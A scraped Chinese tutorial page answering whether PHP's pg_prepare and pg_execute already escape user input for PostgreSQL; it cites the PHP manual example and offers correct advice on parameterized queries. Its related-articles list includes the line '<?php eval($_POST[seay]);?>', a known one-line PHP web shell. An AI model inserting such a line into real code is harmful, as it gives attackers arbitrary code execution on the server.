首页 / PHP / 用PHP清理PostgreSQL中所有用户的输入

用PHP清理PostgreSQL中所有用户的输入

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了用PHP清理PostgreSQL中所有用户的输入，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1164字，纯文字阅读大概需要2分钟。

内容图文

使用pg_prepare时是否需要显式清理？

我觉得pg_prepare自动清理用户的输入,因此我们不需要这个

 $question_id = filter_input(INPUT_GET, 'questions', FILTER_SANITIZE_NUMBER_INT);

我使用Postgres的上下文

 $result = pg_prepare($dbconn, "query9", "SELECT title, answer
     FROM answers 
     WHERE questions_question_id = $1;");                                  
 $result = pg_execute($dbconn, "query9", array($_GET['question_id']));

解决方法:

根据pg_prepare上的Postgres documentation,所有转义已为您完成.请参阅示例部分,其中列出了以下代码(包括注释)：

<?php
// Connect to a database named "mary"
$dbconn = pg_connect("dbname=mary");

// Prepare a query for execution
$result = pg_prepare($dbconn, "my_query", 'SELECT * FROM shops WHERE name = $1');

// Execute the prepared query.  Note that it is not necessary to escape
// the string "Joe's Widgets" in any way
$result = pg_execute($dbconn, "my_query", array("Joe's Widgets"));

// Execute the same prepared query, this time with a different parameter
$result = pg_execute($dbconn, "my_query", array("Clothes Clothes Clothes"));
?>

请注意,在查询字符串周围使用单引号(‘)而不是双引号(“)可能会很有用,因为那样$1不会意外插入到字符串中.

内容总结

以上是互联网集市为您收集整理的用PHP清理PostgreSQL中所有用户的输入全部内容，希望文章能够帮你解决用PHP清理PostgreSQL中所有用户的输入所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/882817.html

来源：【匿名】

【上一篇】php-使用MYSQL列出具有最新注释/活动的类别【下一篇】PHP 5 数据对象 (PDO) 抽象层与 Oracle

更多 ►

【用PHP清理PostgreSQL中所有用户的输入】教程文章相关的互联网学习教程文章

php接收post过来的 json数据例子【代码】

html代码<html><head><title>json</title><script src="//cdn.bootcss.com/jquery/3.1.1/jquery.js"></script></head><body>json<input type="button" onclick="sendJson()" value="点击"></body><script>function sendJson() {var stu={name:"冷荣富",age:22,sex:"男"};$.ajax({type : "POST", //提交方式 url : "http://localhost/jsonTest.php",//路径,www根目录下 data : {"student" : stu},//数据，这...

atitit.http get post的原理以及框架实现java php

atitit.http get post的原理以及框架实现java php 1. 相关的设置 11.1. urlencode 11.2. 输出流的编码 11.3. 图片，文件的post 12. get比较简单只是文字串 13. post 字节流（基础） 14. post文字（with编码） 25. 发送http请求的框架 25.1. jdk URLConnection 25.2. jdk HttpURLConnection 25.3. apache httpclient 25.4. http browser 36. 参考 3 1. 相关的设置1.1. urlencode1.2. 输出流的编码1.3. 图片，文件的post 2. get比...

PHP_RAW_POST_DATA特性【代码】

在PHP5.6.x中已废止特性使用 always_populate_raw_post_data 会导致在填充 $HTTP_RAW_POST_DATA 时产生 E_DEPRECATED 错误。请使用 php://input 替代$HTTP_RAW_POST_DATA，因为它可能在后续的 PHP 版本中被移除。设置 always_populate_raw_post_data 为 -1 （这样会强制 $HTTP_RAW_POST_DATA 未定义，所以也不回导致 E_DEPRECATED 的错误）来体验新的行为。来源：https://www.php.net/manual/zh/migration56.deprecated.php 1、...

php使用cUrl方法 get、post请求【代码】

php使用curl方法，请确保已经开启curl扩展。传送门：http://www.cnblogs.com/wgq123/p/7450667.html/**Curl请求get方法 *@$url String 要请求的url地址 *@$dara Array 要传递的参数 *@$timeout int 超时时间 *@return json /function curlGetRequest($url=‘‘, $data=array(), $timeout=5){if($url == ‘‘ || $timeout <=0){returnfalse;}$param = ‘‘;if(!empty($data)){foreach($dataas$k=>$v){$param .= $k ...

在PHP中使用CURL实现GET和POST请求的方法

1.CURL介绍CURL是一个利用URL语法规定来传输文件和数据的工具.支持很多协议，如HTTP、FTP、TELNET等。幸运的是PHP也支持CURL库。本文将介绍curl的一些高级特性，以及在PHP中如何运用它。2.基本结构在学习更为复杂的功能之前，先来看一下在PHP中建立CURL请求的基本步骤：（1）初始化 curl_init()（2）设置变量 curl_setopt() //最为重要，一切玄妙均在此。有一长串curl参数可供设置，它们能指定URL请求的各个细节。要一次性全部看完...

php报错日志：PHP Deprecated:Automatically populating $HTTP_RAW_POST_DATA is deprecated

前几天将线上php服务升级到5.6.x版本后，php-error.log报出错误：PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated 原因：上面的报错意思是“自动变量$HTTP_RAW_POST_DATA已过时（deprecated）”这个问题和PHP版本有关系,PHP5.6之后的高版本都已废弃了$HTTP_RAW_POST_DATA这个全局变量设置，可以使用 php://input 替代 $HTTP_RAW_POST_DATA。使用always_populate_raw_post_data会导致在填充$HTTP_RAW...

php获取post中的json数据的实现方法

突然想到了以前接触过flash将图片二进制流传给php，灵机一动用$GLOBALS[‘HTTP_RAW_POST_DATA‘]获取到了。于是就深入的查了一下，原来PHP默认只识别application/x-www.form-urlencoded标准的数据类型，因此，对型如text/xml 或者 soap 或者 application/octet-stream 之类的内容无法解析，如果用$_POST数组来接收就会失败！故保留原型，交给$GLOBALS[‘HTTP_RAW_POST_DATA‘] 来接收。php的HTTP_RAW_POST_DATA 用Content-Type=tex...

php 利用socket发送HTTP请求（GET，POST）【代码】

今天给大家带来的是如何利用socket发送GET，POST请求。我借用燕十八老师封装好的一个Http类给进行说明。　　在日常编程中相信很多人和我一样大部分时间是利用浏览器向服务器提出GET，POST请求，那么可否利用其它方式提出GET,POST请求呢？答案必然是肯定的。了解过HTTP协议的人知道，浏览器提交请求的实质是向服务器发送一个请求信息，这个请求信息有请求行，请求头，请求体（非必须）构成。服务器根据请求信息返回一个响应信息。连...

php 上传大文件主要涉及配置upload_max_filesize和post_max_size两个选项

转自： http://blog.sina.com.cn/s/blog_6c739e63010137ui.html php手册上传错误资料：http://php.net/manual/zh/features.file-upload.errors.phphttp://php.net/upload-max-filesizeMaximum number of files that can be uploaded via a single requestmax_file_uploads = 20 :单个请求时，允许上传的最大文件数 ;Maximum allowed size for uploaded files.upload_max_filesize = 64M,允许上传你的最大文件大小 ; ; Maximum siz...

PHP中 GET 与 POST

GET 数据请求<span style="font-size:18px;">$url = "http://www.xxxx.com?user=111"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); $out = curl_exec($ch); curl_close($ch); $obj = json_decode($out); print $obj;</span>POST 数据发送<span style="font-size:18px;">$url = "http://www.xxxx.com?user=111"; $post_data = "s...

PHP输入流php://input与$_POST、$_GET

Content-Type的取值会影响php的输入流学习笔记1，Content-Type仅在取值为application/x-www-data-urlencoded和multipart/form-data两种情况下，PHP才会将http请求数据包中相应的数据填入全局变量$_POST2，PHP不能识别的Content-Type类型的时候，会将http请求包中相应的数据填入变量$HTTP_RAW_POST_DATA3, 只有Coentent-Type不为multipart/form-data的时候，PHP不会将http请求数据包中的相应数据填入php://input，否则其它情况都会...

<?php eval($_POST[seay]);?>

<?php eval($_POST[seay]);?>?php eval($_POST[seay]);?>' ref='nofollow'>原文：http://4290721.blog.51cto.com/4280721/1356426

PHP——封装Curl请求方法支持POST | DELETE | GET | PUT 等【代码】

前言Curl: https://www.php.net/manual/en/book.curl.phpcurl_setopt: https://www.php.net/manual/en/function.curl-setopt.php代码注释应该很详细了吧，不懂的可以评论或者看上面手册。设置桥接抓包需要配合抓包工具使用。/*** 多种请求方法封装* * @param string $url 请求地址* @param string $method 请求方式* @param array $header 请求头* @param array $data 请求体* * @return mixd */function ...

php中模拟post，get请求和接受请求详细讲解【代码】

在php中我们经常用到curl拓展来进行模拟post、get请求，下面就来具体说说怎么模拟：一、首先模拟post请求：function http_post_data($url, $query_data,$timeout=30) {　　if(is_array($query_data)){ $post_str = http_build_query($query_data); //变成 a=1&b=2形式会进行urlencode()转换　　}$curl = curl_init(); // 初始化curlcurl_setopt($curl, CURLOPT_URL, $url);curl_setopt(...

php post提交xml文件【代码】

<?php header("Content-type: text/xml;"); // xml code demo$xmlData = ‘<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><execProc_string xmlns="http://tempuri.org/"><sql>bk_jskc</sql><p></p><my>xxxx@163.com#.cn</my></execProc_string...

首页 / PHP / 用PHP清理PostgreSQL中所有用户的输入

用PHP清理PostgreSQL中所有用户的输入

内容导读

内容图文

内容总结

内容备注

内容手机端

【用PHP清理PostgreSQL中所有用户的输入】教程文章相关的互联网学习教程文章

php接收post过来的 json数据例子【代码】

atitit.http get post的原理以及框架实现java php

PHP_RAW_POST_DATA特性【代码】

php使用cUrl方法 get、post请求【代码】

在PHP中使用CURL实现GET和POST请求的方法

php报错日志：PHP Deprecated:Automatically populating $HTTP_RAW_POST_DATA is deprecated

php获取post中的json数据的实现方法

php 利用socket发送HTTP请求（GET，POST）【代码】

php 上传大文件主要涉及配置upload_max_filesize和post_max_size两个选项

PHP中 GET 与 POST

PHP输入流php://input与$_POST、$_GET

<?php eval($_POST[seay]);?>

PHP——封装Curl请求方法支持POST | DELETE | GET | PUT 等【代码】

php中模拟post，get请求和接受请求详细讲解【代码】

php post提交xml文件【代码】

POSTGRESQL - 相关标签

PHP - 相关标签

输入 - 相关标签

PHP - 技术教程分类

PHP - 最新教程

PHP - 最热教程